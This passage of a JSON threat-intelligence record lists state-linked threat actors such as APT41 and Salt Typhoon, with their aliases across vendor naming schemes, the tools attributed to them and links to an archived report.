			"updated_at": "2026-04-10T02:00:03.389898Z",
			"deleted_at": null,
			"main_name": "Earth Estries",
			"aliases": [],
			"source_name": "MISPGALAXY:Earth Estries",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff",
			"created_at": "2024-12-28T02:01:54.899899Z",
			"updated_at": "2026-04-10T02:00:04.880446Z",
			"deleted_at": null,
			"main_name": "Salt Typhoon",
			"aliases": [
				"Earth Estries",
				"FamousSparrow",
				"GhostEmperor",
				"Operator Panda",
				"RedMike",
				"Salt Typhoon",
				"UNC2286"
			],
			"source_name": "ETDA:Salt Typhoon",
			"tools": [
				"Agentemis",
				"Backdr-NQ",
				"Cobalt Strike",
				"CobaltStrike",
				"Crowdoor",
				"Cryptmerlin",
				"Deed RAT",
				"Demodex",
				"FamousSparrow",
				"FuxosDoor",
				"GHOSTSPIDER",
				"HemiGate",
				"MASOL RAT",
				"Mimikatz",
				"NBTscan",
				"NinjaCopy",
				"ProcDump",
				"PsExec",
				"PsList",
				"SnappyBee",
				"SparrowDoor",
				"TrillClient",
				"WinRAR",
				"Zingdoor",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6477a057-a76b-4b60-9135-b21ee075ca40",
			"created_at": "2025-11-01T02:04:53.060656Z",
			"updated_at": "2026-04-10T02:00:03.845594Z",
			"deleted_at": null,
			"main_name": "BRONZE TIGER",
			"aliases": [
				"Earth Estries ",
				"Famous Sparrow ",
				"Ghost Emperor ",
				"RedMike ",
				"Salt Typhoon "
			],
			"source_name": "Secureworks:BRONZE TIGER",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434655,
	"ts_updated_at": 1775826758,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2262c24115e3030b2c4a9eead986751226d2dc4d.pdf",
		"text": "https://archive.orkl.eu/2262c24115e3030b2c4a9eead986751226d2dc4d.txt",
		"img": "https://archive.orkl.eu/2262c24115e3030b2c4a9eead986751226d2dc4d.jpg"
	}
}